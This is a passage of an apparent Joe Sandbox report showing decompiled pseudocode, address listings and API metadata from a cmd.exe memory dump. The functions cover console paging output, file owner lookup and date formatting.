									if(_a568 == 0) {
										_t354 =  &_a48;
									}
									_t277 = E001C51C9(_t354, _a576,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
									__eflags = _t277;
									if(_t277 != 0) {
										L33:
										E001C6B76(_t399, L"%s", _t313);
										goto L36;
									} else {
										_t281 = _a568;
										__eflags = _t281;
										if(_t281 == 0) {
											_t281 =  &_a48;
										}
										_t282 = GetFileSecurityW(_t281, 1, _v0, 0x10000,  &_a40);
										__eflags = _t282;
										if(_t282 == 0) {
											goto L33;
										} else {
											_t285 = GetSecurityDescriptorOwner(_v0,  &_a20,  &_a44);
											__eflags = _t285;
											if(_t285 == 0) {
												goto L33;
											}
											_t286 = E001C7797( &_a40);
											__eflags = _t286;
											if(_t286 == 0) {
												L34:
												_push(_t313);
												_t383 = L"%s";
												L35:
												E001C6B76(_t399, _t383);
												__eflags = 0;
												_a16 = 0;
												L36:
												E001C0040(_v0);
												L37:
												__eflags =  *_t394 & 0x00000400;
												_t381 =  *0x1dd190; // 0x13
												if(( *_t394 & 0x00000400) == 0) {
													_t382 = _t381 + 0x2a;
													__eflags = _t381 + 0x2a;
												} else {
													_t382 = _t381 + 0x37;
												}
												E001D7A11(_t399, _t382);
												L41:
												__imp__??_V@YAXPAX@Z(_a568);
												_t372 =  *_t394;
												_pop(_t337);
												goto L42;
											}
											 *0x1fc034(0, _a20,  &_a648,  &_a16,  &_a1184,  &_a28,  &_a36);
											__eflags = 0;
											if(0 == 0) {
												goto L34;
											}
											_t314 = L"%s";
											E001C6B76(_t399, _t314,  &_a1156);
											E001C6B76(_t399, _t314, "\\");
											_t383 = _t314;
											_push( &_a612);
											goto L35;
										}
									}
								}
								E001C6B76(_t399, L"%s", _t313);
								goto L37;
							}
							E001C6B76(_t399, L"%s", _t313);
							goto L41;
						}
					}
					_t306 = E001DAB79(_t399, _t372, _a4);
					L3:
					_t311 = _t306;
					goto L4;
				}
				_t306 = E001C660F(_t399, _t372,  *((intOrPtr*)(_a12 + 4)), _a4);
				goto L3;
			}

0x001c6555
0x001c655d
0x001c6562
0x001c6569
0x001c6570
0x001c6574
0x001c6578
0x001c657c
0x001c657f
0x001c6585
0x001c6589
0x001c658c
0x001c658f
0x001c6593
0x001c6596
0x001c6598
0x001c659a
0x001c659e
0x001c65a4
0x001cf9ae
0x001cf9b0
0x00000000
0x00000000
0x001cf9bf
0x001cf9c1
0x001cf9c8
0x001cf9cb
0x001cf9cd
0x001cf9cf
0x001c65ca
0x001c65d1
0x001c65d2
0x001c65d3
0x001c65de
0x001c65de
0x001cf9d5
0x001cf9db
0x001cf9db
0x001c65aa
0x001c65ad
0x001cf9e2
0x001cf9e5
0x001cf9f8
0x001cf9fe
0x001d0030
0x001d0034
0x001d0037
0x001d0044
0x001d0039
0x001d0039
0x001d0039
0x001d0053
0x001d0055
0x001d0057
0x001d005b
0x001d005e
0x001d0067
0x001d0073
0x001d0073
0x001d0075
0x001d0079
0x001c65c8
0x001c65c8
0x00000000
0x001c65c8
0x001d0081
0x001d0086
0x001d0088
0x00000000
0x00000000
0x00000000
0x001d008e
0x001cfa08
0x001cfa0b
0x001cfa13
0x001cfa15
0x001cfa17
0x001cfa1b
0x001cfa1d
0x001cfeac
0x001cfeac
0x001cfeaf
0x001cfec0
0x001cfec0
0x001cfec6
0x00000000
0x00000000
0x001cfecc
0x001cfed1
0x001cfed3
0x00000000
0x00000000
0x001cfede
0x001cfee8
0x001cfef1
0x001cff00
0x001cff0e
0x001cff11
0x001cff27
0x001cff2c
0x001cff2e
0x001d001d
0x001d0024
0x00000000
0x001d002a
0x001cff34
0x001cff3b
0x001cff3d
0x001cff3f
0x001cff3f
0x001cff4a
0x001cff5c
0x001cff61
0x001cff63
0x001cff69
0x001cff70
0x001cff72
0x001cff74
0x001cff74
0x001cff7b
0x001cff85
0x001cff8b
0x001cff8f
0x001cff92
0x001cff98
0x001cff98
0x001cff9c
0x001cff9f
0x001cff9f
0x001cffa2
0x001cffa5
0x001cffa5
0x001cffb0
0x001cffb3
0x001cffbd
0x001cffbd
0x001cffca
0x001cffcf
0x001cffd1
0x001cffd3
0x00000000
0x00000000
0x001cffd5
0x001cffd8
0x00000000
0x00000000
0x001cffdc
0x001cffe1
0x001cffe5
0x001cffe7
0x00000000
0x00000000
0x001cfff0
0x001cfff6
0x00000000
0x001cfffa
0x001cffb5
0x001cffbb
0x00000000
0x00000000
0x00000000
0x001d0000
0x001d0009
0x001d000f
0x001d000f
0x001d0017
0x001d0017
0x001cff92
0x00000000
0x001cff63
0x001cfeb1
0x001cfeb3
0x001cfeb8
0x001cfeba
0x00000000
0x00000000
0x00000000
0x001cfeba
0x001cfa23
0x001cfa29
0x001cfa65
0x001cfa6b
0x001cfa6b
0x001cfa2b
0x001cfa2b
0x001cfa2f
0x001cfa33
0x001cfa35
0x001cfa3b
0x001cfa40
0x001cfa4b
0x001cfa55
0x001cfa55
0x001cfa5a
0x001cfa60
0x001cfa60
0x001cfa6e
0x001cfa70
0x001cfa75
0x001cfa77
0x001cfa7c
0x001cfa80
0x001cfa86
0x001cfc60
0x001cfc67
0x001cfc69
0x001cfc6b
0x001cfc74
0x001cfc76
0x001cfc7a
0x001cfc80
0x001cfeaa
0x001cfeaa
0x001cfeaa
0x00000000
0x001cfeaa
0x001cfc86
0x001cfc8d
0x00000000
0x00000000
0x001cfc98
0x001cfca2
0x001cfcab
0x001cfcb7
0x001cfcc2
0x001cfcc5
0x001cfcdb
0x001cfce0
0x001cfce2
0x001cfe8b
0x001cfe90
0x001cfe97
0x001cfe9c
0x001cfea3
0x001cfea9
0x00000000
0x001cfea9
0x001cfce8
0x001cfcef
0x001cfcf1
0x001cfcf3
0x001cfcf3
0x001cfd09
0x001cfd0e
0x001cfd10
0x00000000
0x001cfd16
0x001cfd16
0x001cfd1d
0x001cfd1f
0x001cfd21
0x001cfd21
0x001cfd35
0x001cfd3b
0x001cfd3f
0x001cfd42
0x001cfd6f
0x001cfd75
0x001cfd7a
0x001cfd7c
0x001cfd7e
0x001cfd94
0x001cfd99
0x001cfda4
0x001cfdda
0x001cfde5
0x001cfe29
0x001cfe2a
0x001cfe2a
0x001cfe2d
0x001cfe32
0x001cfe36
0x001cfe38
0x001cfe40
0x001cfe49
0x001cfe4e
0x001cfe56
0x001cfe5c
0x001cfe65
0x001cfe65
0x001cfe6f
0x001cfe76
0x001cfe7b
0x00000000
0x001cfe7b
0x001cfdef
0x001cfe00
0x001cfe04
0x001cfe06
0x00000000
0x00000000
0x001cfe10
0x001cfe10
0x001cfe12
0x001cfe19
0x001cfe19
0x001cfe21
0x00000000
0x001cfe21
0x001cfdae
0x001cfdbf
0x001cfdc3
0x001cfdc5
0x00000000
0x00000000
0x001cfdd1
0x00000000
0x001cfdd1
0x001cfd80
0x00000000
0x001cfd44
0x001cfd44
0x001cfd49
0x001cfd4e
0x001cfd85
0x001cfd85
0x001cfe7f
0x001cfe83
0x00000000
0x001cfe83
0x001cfd42
0x001cfa8c
0x001cfa8e
0x001cfa9b
0x001cfaa1
0x001cfaad
0x001cfab5
0x001cfabd
0x001cfac4
0x001cfacf
0x001cfad2
0x001cfae8
0x001cfaed
0x001cfaef
0x001cfb08
0x001cfb0d
0x001cfb11
0x001cfb13
0x001cfb27
0x001cfb2e
0x001cfb30
0x001cfb32
0x001cfb32
0x001cfb4c
0x001cfb51
0x001cfb53
0x001cfc08
0x001cfc10
0x00000000
0x001cfb59
0x001cfb59
0x001cfb60
0x001cfb62
0x001cfb64
0x001cfb64
0x001cfb79
0x001cfb7f
0x001cfb81
0x00000000
0x001cfb87
0x001cfb95
0x001cfb9b
0x001cfb9d
0x00000000
0x00000000
0x001cfb9f
0x001cfba4
0x001cfba6
0x001cfc17
0x001cfc17
0x001cfc18
0x001cfc1d
0x001cfc1f
0x001cfc24
0x001cfc26
0x001cfc2a
0x001cfc2e
0x001cfc33
0x001cfc33
0x001cfc39
0x001cfc3f
0x001cfc46
0x001cfc46
0x001cfc41
0x001cfc41
0x001cfc41
0x001cfc4b
0x001cfc50
0x001cfc57
0x001cfc5d
0x001cfc5f
0x00000000
0x001cfc5f
0x001cfbce
0x001cfbd4
0x001cfbd6
0x00000000
0x00000000
0x001cfbdf
0x001cfbe9
0x001cfbf7
0x001cfc03
0x001cfc05
0x00000000
0x001cfc05
0x001cfb81
0x001cfb53
0x001cfb1d
0x00000000
0x001cfb1d
0x001cfaf9
0x00000000
0x001cfaf9
0x001cfa86
0x001cf9ee
0x001c65c6
0x001c65c6
0x00000000
0x001c65c6
0x001c65c1
0x00000000

Strings

[.], xrefs: 001CFE8B
[..], xrefs: 001CFD44
[...], xrefs: 001CFD80
:, xrefs: 001CFFB5
..., xrefs: 001CFA77, 001CFAF1, 001CFB15, 001CFC08, 001CFC17

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID:
String ID: [...]$ [..]$ [.]$...$:
API String ID: 0-1980097535
Opcode ID: 38862f840adff24446b35d27c0d3fa4ef7d87b607e3defd58600d795428fc492
Instruction ID: 8c8263498ec60a5a83e2ae9574494d67f0e1558bc87a6777f8ddf1845faa054a
Opcode Fuzzy Hash: 38862f840adff24446b35d27c0d3fa4ef7d87b607e3defd58600d795428fc492
Instruction Fuzzy Hash: 4912ABB02083429BD725DF24C885FAFB7E6EFA8344F10492DF58997291EB30D946CB56

Uniqueness

Uniqueness Score: -1.00%

Function 001BC5CA Relevance: 30.2, APIs: 20, Instructions: 238
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E001BC5CA(void* __ecx, long __edx, void* _a4, signed int _a8) {
				signed int _v8;
				short _v16;
				short _v20;
				signed int _v26;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				signed int _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				long _v60;
				signed int _v64;
				void* _v68;
				long _v72;
				long _v76;
				long _v80;
				intOrPtr _v84;
				char _v88;
				void* _v108;
				long _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t66;
				long _t68;
				long _t71;
				char* _t81;
				long _t85;
				intOrPtr _t88;
				signed int _t91;
				long _t93;
				long _t95;
				signed short _t100;
				struct _COORD _t105;
				void* _t114;
				void* _t115;
				long _t119;
				long _t122;
				signed int _t125;
				long _t128;
				void* _t138;
				void* _t141;
				void* _t143;
				signed int _t150;

				_t63 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t63 ^ _t150;
				_v64 = _a8;
				_t141 = __ecx;
				_v76 = __edx;
				_t137 = 0;
				_v72 = 0;
				_t66 = E001C269C(_a8);
				if(_t66 == 0) {
					L13:
					_t114 = 0;
				} else {
					__imp___get_osfhandle(__edx);
					_t114 = _t66;
					if(GetConsoleScreenBufferInfo(_t114,  &_v32) == 0) {
						goto L13;
					} else {
						_t137 = _v16 - _v20 - 1;
						_v72 = _t137;
					}
				}
				_v60 = _v60 & 0x00000000;
				_t119 = E001BC6F4(_t141, _a4, _v64);
				_t133 = 0x1eb980;
				_v64 = _t119;
				_t142 = _t119;
				_v68 = 0x1eb980;
				if(_t119 == 0) {
					_t68 = _v60;
					goto L11;
				} else {
					do {
						if(_t114 == 0) {
							_t119 = _v76;
							_t85 = E001C27C8(_t142 + _t142, _t133, _t142 + _t142,  &_v88);
							__eflags = _t85;
							if(_t85 == 0) {
								L16:
								_t68 = GetLastError();
								_v60 = _t68;
								break;
							} else {
								__eflags = _v88 - _t142 + _t142;
								if(_v88 == _t142 + _t142) {
									goto L9;
								} else {
									goto L16;
								}
							}
						} else {
							if( *0x1f8065 != 0) {
								_t128 =  *0x1f851c;
								__eflags = _t128 - _t137;
								if(_t128 < _t137) {
									L33:
									_t143 = _t133;
									_t88 = _t133 + _v64 * 2;
									_v84 = _t88;
									__eflags = _t133 - _t88;
									if(_t133 < _t88) {
										while(1) {
											__eflags = _t128 - _t137;
											if(_t128 >= _t137) {
												break;
											}
											_t91 =  *_t143 & 0x0000ffff;
											_t143 = _t143 + 2;
											__eflags = _t91 - 0xa;
											if(_t91 == 0xa) {
												_t128 = _t128 + 1;
												__eflags = _t128;
											}
											__eflags = _t143 - _v84;
											if(_t143 < _v84) {
												continue;
											}
											break;
										}
										 *0x1f851c = _t128;
									}
									_t142 = _t143 - _t133 >> 1;
									goto L8;
								} else {
									 *0x1f851c = 0;
									_t93 = GetConsoleScreenBufferInfo(_t114,  &_v32);
									__eflags = _t93;
									if(_t93 == 0) {
										L32:
										_t128 =  *0x1f851c;
										_t133 = _v68;
										goto L33;
									} else {
										_t95 = WriteConsoleW(_t114,  *0x1f8518,  *0x1f8514,  &_v60, 0);
										__eflags = _t95;
										if(_t95 == 0) {
											goto L32;
										} else {
											FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
											GetConsoleMode(_t114,  &_v80);
											_t100 = SetConsoleMode(_t114, 0);
											__imp___getch();
											_t137 = _t100 & 0x0000ffff;
											SetConsoleMode(_t114, _v80);
											GetConsoleScreenBufferInfo(_t114,  &_v56);
											_t133 = _v32.dwSize * _v26;
											_push( &_v60);
											_t105 = _v32.dwCursorPosition;
											_push(_t105);
											_t142 = _v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition;
											_push(_v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition);
											_push(0x20);
											_push(_t114);
											FillConsoleOutputCharacterW();
											SetConsoleCursorPosition(_t114, _v32.dwCursorPosition);
											__eflags = (_t100 & 0x0000ffff) - 3;
											if((_t100 & 0x0000ffff) == 3) {
												EnterCriticalSection( *0x1e3858);
												 *0x1dd544 = 1;
												LeaveCriticalSection( *0x1e3858);
												_t68 = 0;
												L12:
												return E001C6FD0(_t68, _t114, _v8 ^ _t150, _t133, _t137, _t142);
											} else {
												_t137 = _v72;
												goto L32;
											}
										}
									}
								}
							} else {
								_t142 = 0xa0;
								if(_t119 <= 0xa0) {
									_t142 = _t119;
								}
								L8:
								if(WriteConsoleW(_t114, _t133, _t142,  &_v60, 0) == 0) {
									_t68 = GetLastError();
								} else {
									L9:
									_t68 = 0;
								}
								goto L10;
							}
						}
						goto L55;
						L10:
						_t119 = _v64 - _t142;
						_v60 = _t68;
						_v64 = _t119;
						_t133 = _v68 + _t142 * 2;
						_v68 = _t133;
					} while (_t119 != 0);
					L11:
					if(_t68 != 0) {
						__eflags = _v76 - 2;
						if(__eflags != 0) {
							goto L12;
						} else {
							do {
								__eflags = E001C4B60(__eflags, 0);
							} while (__eflags == 0);
							exit(1);
							asm("int3");
							while(1) {
								L44:
								__eflags = _t133 - _t114;
								if(_t133 == _t114) {
									_t119 = _t119 + 2;
								}
								while(1) {
									_t134 = _t114;
									_t71 = E001BD7D4(_t119, _t114);
									_t122 = _t71;
									__eflags = _t122;
									if(_t122 == 0) {
										break;
									}
									_t119 = _t122 + 2;
									_t133 =  *_t119 & 0x0000ffff;
									__eflags = _t133 - 0x31 - 8;
									if(_t133 - 0x31 > 8) {
										goto L44;
									} else {
										_t142 = _t142 + 1;
										continue;
									}
									L24:
									__eflags = _v8 ^ _t150;
									return E001C6FD0(_t76, _t115, _v8 ^ _t150, _t134, _t137, _t142);
									goto L55;
								}
								_t115 = _v108;
								__eflags = _t142 - _a4;
								if(_t142 > _a4) {
									_t115 = HeapAlloc(GetProcessHeap(), 0, _t142 << 2);
									__eflags = _t115;
									if(_t115 != 0) {
										_t125 = 0;
										__eflags = _t142;
										if(_t142 != 0) {
											_t138 = _v108;
											_t134 = _a4;
											do {
												__eflags = _t125 - _t134;
												if(_t125 >= _t134) {
													_t81 = " ";
												} else {
													 *_t138 =  *_t138 + 4;
													_t81 =  *( *_t138 - 4);
												}
												 *(_t115 + _t125 * 4) = _t81;
												_t125 = _t125 + 1;
												__eflags = _t125 - _t142;
											} while (_t125 < _t142);
											_t137 = _v112;
										}
										_t142 = FormatMessageW(0x3800, 0, _t137, 0, 0x1eb980, 0x2000, _t115);
										RtlFreeHeap(GetProcessHeap(), 0, _t115);
										goto L23;
									}
								} else {
									_push(_t115);
									_push(0x2000);
									_push(0x1eb980);
									_push(_t71);
									_push(_t137);
									_push(_t71);
									_push(0x1800);
									_t142 = FormatMessageW();
									L23:
									_t76 = _t142;
								}
								goto L24;
							}
						}
					} else {
						goto L12;
					}
				}
				L55:
			}

0x001bc5d2
0x001bc5d9
0x001bc5e3
0x001bc5e7
0x001bc5e9
0x001bc5ec
0x001bc5f0
0x001bc5f3
0x001bc5fa
0x001bc6b9
0x001bc6b9
0x001bc600
0x001bc601
0x001bc607
0x001bc617
0x00000000
0x001bc61d
0x001bc627
0x001bc628
0x001bc628
0x001bc617
0x001bc62e
0x001bc63c
0x001bc63e
0x001bc643
0x001bc646
0x001bc648
0x001bc64d
0x001bc6ef
0x00000000
0x001bc653
0x001bc653
0x001bc655
0x001bc6c4
0x001bc6cb
0x001bc6d0
0x001bc6d2
0x001bc6dc
0x001bc6dc
0x001bc6e2
0x00000000
0x001bc6d4
0x001bc6d7
0x001bc6da
0x00000000
0x00000000
0x00000000
0x00000000
0x001bc6da
0x001bc657
0x001bc65e
0x001cad2a
0x001cad30
0x001cad32
0x001cae01
0x001cae04
0x001cae06
0x001cae09
0x001cae0c
0x001cae0e
0x001cae10
0x001cae10
0x001cae12
0x00000000
0x00000000
0x001cae14
0x001cae17
0x001cae1a
0x001cae1d
0x001cae1f
0x001cae1f
0x001cae1f
0x001cae20
0x001cae23
0x00000000
0x00000000
0x00000000
0x001cae23
0x001cae25
0x001cae25
0x001cae2d
0x00000000
0x001cad38
0x001cad3f
0x001cad45
0x001cad4b
0x001cad4d
0x001cadf8
0x001cadf8
0x001cadfe
0x00000000
0x001cad53
0x001cad65
0x001cad6b
0x001cad6d
0x00000000
0x001cad73
0x001cad7c
0x001cad87
0x001cad8f
0x001cad95
0x001cad9e
0x001cada2
0x001cadad
0x001cadc2
0x001cadc9
0x001cadca
0x001cadd0
0x001cadda
0x001caddc
0x001caddd
0x001caddf
0x001cade0
0x001cadea
0x001cadf0
0x001cadf3
0x001cae3a
0x001cae46
0x001cae50
0x001cae56
0x001bc6a6
0x001bc6b6
0x001cadf5
0x001cadf5
0x00000000
0x001cadf5
0x001cadf3
0x001cad6d
0x001cad4d
0x001bc664
0x001bc664
0x001bc66f
0x001bc671
0x001bc671
0x001bc673
0x001bc684
0x001bc6e7
0x001bc686
0x001bc686
0x001bc686
0x001bc686
0x00000000
0x001bc684
0x001bc65e
0x00000000
0x001bc688
0x001bc68e
0x001bc690
0x001bc693
0x001bc696
0x001bc699
0x001bc699
0x001bc69e
0x001bc6a0
0x001cae5d
0x001cae61
0x00000000
0x001cae67
0x001cae67
0x001cae6e
0x001cae6e
0x001cae74
0x001cae7a
0x001cae7b
0x001cae7b
0x001cae7b
0x001cae7e
0x001cae84
0x001cae84
0x001bc74b
0x001bc74b
0x001bc74d
0x001bc752
0x001bc754
0x001bc756
0x00000000
0x00000000
0x001bc794
0x001bc797
0x001bc79d
0x001bc7a1
0x00000000
0x001bc7a7
0x001bc7a7
0x00000000
0x001bc7a7
0x001bc781
0x001bc786
0x001bc791
0x00000000
0x001bc791
0x001bc758
0x001bc75b
0x001bc75e
0x001caea1
0x001caea3
0x001caea5
0x001caeab
0x001caead
0x001caeaf
0x001caeb1
0x001caeb4
0x001caeb7
0x001caeb7
0x001caeb9
0x001caec5
0x001caebb
0x001caebb
0x001caec0
0x001caec0
0x001caeca
0x001caecd
0x001caece
0x001caece
0x001caed2
0x001caed2
0x001caef3
0x001caefc
0x00000000
0x001caefc
0x001bc764
0x001bc764
0x001bc765
0x001bc76a
0x001bc76f
0x001bc770
0x001bc771
0x001bc772
0x001bc77d
0x001bc77f
0x001bc77f
0x001bc77f
0x00000000
0x001bc75e
0x001cae7b
0x00000000
0x00000000
0x00000000
0x001bc6a0
0x00000000

APIs

Part of subcall function 001C269C: _get_osfhandle.MSVCRT ref: 001C26A7
Part of subcall function 001C269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001BC5F8,?,?,?), ref: 001C26B6
Part of subcall function 001C269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001BC5C6), ref: 001C26D2
Part of subcall function 001C269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,00000002), ref: 001C26E1
Part of subcall function 001C269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001C26EC
Part of subcall function 001C269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001BC5C6), ref: 001C26F5

_get_osfhandle.MSVCRT ref: 001BC601
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,001BC5C6,?,?,?,?,?,?,?,?,?,?,?,?,?,001BC5C6), ref: 001BC60F
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001EB980,000000A0,00000000,00000000,?,?,?,?,?), ref: 001BC67C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?), ref: 001BC6DC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001BC6E7

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
String ID:
API String ID: 2173784998-0
Opcode ID: 227f2481f1ae961b7e079b7026f5acfcc6fa7d46b6bf7969aefc07f5e9448f3d
Instruction ID: 1f10f16738cebefa660e225e392b8320e5ee6ec38b7d42955261330d31400598
Opcode Fuzzy Hash: 227f2481f1ae961b7e079b7026f5acfcc6fa7d46b6bf7969aefc07f5e9448f3d
Instruction Fuzzy Hash: 77816471A00219AFCB14EFA5EC84EFEBBB9EF54311F11402AF906E6650DB709D85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001B5AEF Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 367
timeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E001B5AEF(void* __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				char _v76;
				short _v332;
				signed short _v342;
				signed short _v344;
				signed short _v346;
				struct _SYSTEMTIME _v348;
				int _v352;
				int _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				signed int _v368;
				struct _FILETIME _v376;
				struct _FILETIME _v384;
				void _v420;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				intOrPtr _t89;
				void* _t90;
				signed int _t96;
				signed int _t97;
				void* _t100;
				void* _t101;
				void* _t110;
				void* _t111;
				signed short _t118;
				long _t128;
				short* _t130;
				void* _t136;
				signed int _t139;
				void* _t143;
				void _t145;
				void _t149;
				signed int _t157;
				signed int _t159;
				signed int _t161;
				int _t164;
				void* _t172;
				signed int _t173;
				signed int _t181;
				signed int _t185;
				void* _t186;
				void* _t189;
				intOrPtr _t197;
				signed int _t202;
				void* _t206;
				void* _t210;
				void* _t211;
				signed int _t212;
				void* _t213;

				_t78 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t78 ^ _t212;
				_t157 = _a4;
				_v364 = __edx;
				_v368 = _t157;
				_v360 = 1;
				if(__ecx != 0) {
					_t161 = 9;
					memcpy( &_v420, __ecx, _t161 << 2);
					_t213 = _t213 + 0xc;
					E001D3C49( &_v420,  &_v376);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v376);
				}
				FileTimeToLocalFileTime( &_v376,  &_v384);
				FileTimeToSystemTime( &_v384,  &_v348);
				_v352 = 0;
				if( *0x1f3cc9 == 0) {
					_t194 = _v348 & 0x0000ffff;
					_t208 = _v346 & 0x0000ffff;
					_t206 = _v342 & 0x0000ffff;
					_v352 = _t194;
					if(_v364 == 0) {
						_t181 = 0x64;
						_t194 = _t194 % _t181;
						_v352 = _t194;
					}
					_t89 =  *0x1dd540; // 0x0
					if(_t89 != 2) {
						if(_t89 == 1) {
							_t110 = _t208;
							_t208 = _t206;
							_t206 = _t110;
						}
					} else {
						_t111 = _t194;
						_t194 = _t206;
						_t206 = _t208;
						_v352 = _t194;
						_t208 = _t111;
					}
					_t164 =  *0x1dd598; // 0x0
					if(_t164 >= 0x20) {
						_t90 =  *0x1dd594; // 0x0
						goto L63;
					} else {
						_t90 = realloc( *0x1dd594, 0x40);
						_pop(0);
						if(_t90 != 0) {
							_t194 = _v352;
							_t164 = 0x20;
							 *0x1dd594 = _t90;
							 *0x1dd598 = _t164;
							L63:
							_push(_t194);
							_push(0x1df80c);
							_push(_t206);
							_push(0x1df80c);
							E001C274C(_t90, _t164, L"%02d%s%02d%s%02d", _t208);
							_t213 = _t213 + 0x20;
							_t206 = 2;
							goto L35;
						}
						_push(_t90);
						goto L50;
					}
				} else {
					_v356 = 0;
					if(GetLocaleInfoW(E001C41A4(), 0x1f,  &_v332, 0x80) == 0) {
						_t194 = 0x80;
						E001C1040( &_v332, 0x80,  *0x1df7f8);
					}
					_t118 = _v332;
					_t210 =  &_v332;
					_t206 = 2;
					if(_t118 == 0) {
						L13:
						if(GetDateFormatW(E001C41A4(), 0,  &_v348,  &_v332,  *0x1dd594,  *0x1dd598) == 0) {
							L32:
							_t208 = GetDateFormatW(E001C41A4(), 0,  &_v348,  &_v332, 0, 0);
							if(_t208 == 0) {
								_t128 = GetLastError();
								_push(0);
								L48:
								 *0x1f3cf0 = _t128;
								_push(_t128);
								L51:
								E001BC5A2(0);
								_t97 = 0;
								L25:
								return E001C6FD0(_t97, _t157, _v8 ^ _t212, _t194, _t206, _t208);
							}
							_t208 = _t208 + 1;
							_t130 = realloc( *0x1dd594, _t208 + _t208);
							_pop(0);
							if(_t130 == 0) {
								_push(0);
								L50:
								_push(8);
								goto L51;
							}
							 *0x1dd594 = _t130;
							 *0x1dd598 = _t208;
							_t208 = 0;
							if(GetDateFormatW(E001C41A4(), 0,  &_v348,  &_v332, _t130, 0) == 0) {
								_t128 = GetLastError();
								_push(0);
								goto L48;
							}
							L35:
							_t208 =  *0x1dd594; // 0x0
							L15:
							_push(E001B5AA7(_v344 & 0x0000ffff));
							_t194 = 0x20;
							E001C1040( &_v76, _t194);
							if(_t157 == 0) {
								if(_v360 != 0) {
									if(E001B68B5() == 0) {
										_push(_t208);
										_push( &_v76);
									} else {
										_push( &_v76);
										_push(_t208);
									}
									_t96 = E001C25D9(L"%s %s ");
								} else {
									_push(_t208);
									_t96 = E001C25D9(L"%s ");
								}
								_t157 = _t96;
								L24:
								_t97 = _t157;
								goto L25;
							}
							if(_v360 == 0 || _v364 != 1) {
								E001C1040(_t157, _a8, _t208);
							} else {
								_t101 = E001B68B5();
								_t197 = _a8;
								_t173 = _t157;
								if(_t101 != 0) {
									E001C1040(_t173, _t197, _t208);
									E001C18C0(_t157, _a8, " ");
									_push( &_v76);
								} else {
									E001C1040(_t173, _t197,  &_v76);
									E001C18C0(_t157, _a8, " ");
									_push(_t208);
								}
								E001C18C0(_t157, _a8);
							}
							_t172 = _t157 + 2;
							_t194 = 0;
							do {
								_t100 =  *_t157;
								_t157 = _t206 + _t157;
							} while (_t100 != 0);
							_t157 = _t157 - _t172 >> 1;
							goto L24;
						}
						_t208 =  *0x1dd594; // 0x0
						if(_t208 == 0) {
							goto L32;
						}
						goto L15;
					} else {
						_t159 = _v356;
						_t185 = _t118 & 0x0000ffff;
						_t136 = 0x64;
						do {
							if(_t185 == 0x27) {
								_t210 = _t210 + _t206;
								_t159 = 0 | _t159 == 0x00000000;
								goto L11;
							}
							if(_t159 != 0 || _t185 != _t136 && _t185 != 0x4d) {
								_t210 = _t210 + _t206;
							} else {
								_t202 = 0;
								do {
									_t210 = _t210 + _t206;
									_t202 = _t202 + 1;
								} while ( *_t210 == _t185);
								_v356 = _t210;
								_t211 = _t210 +  ~_t202 * 2;
								if(_t202 != 1) {
									_t143 = 0x64;
									if(_t185 == _t143) {
										_v360 = 0;
									}
									if(_t202 <= 3) {
										_t210 = _v356;
									} else {
										_t194 = _v356;
										_t186 = _t194;
										_v356 = _t186 + 2;
										do {
											_t145 =  *_t186;
											_t186 = _t186 + _t206;
										} while (_t145 != _v352);
										_t210 = _t211 + 6;
										memmove(_t210, _t194, 2 + (_t186 - _v356 >> 1) * 2);
										_t213 = _t213 + 0xc;
									}
									goto L11;
								}
								_t189 = _t211;
								_t194 = _t189 + 2;
								do {
									_t149 =  *_t189;
									_t189 = _t189 + _t206;
								} while (_t149 != _v352);
								memmove(_t211 + 2, _t211, 2 + (_t189 - _t194 >> 1) * 2);
								_t213 = _t213 + 0xc;
								_t210 = _t211 + 4;
							}
							L11:
							_t139 =  *_t210 & 0x0000ffff;
							_t185 = _t139;
							_t136 = 0x64;
						} while (_t139 != 0);
						_t157 = _v368;
						goto L13;
					}
				}
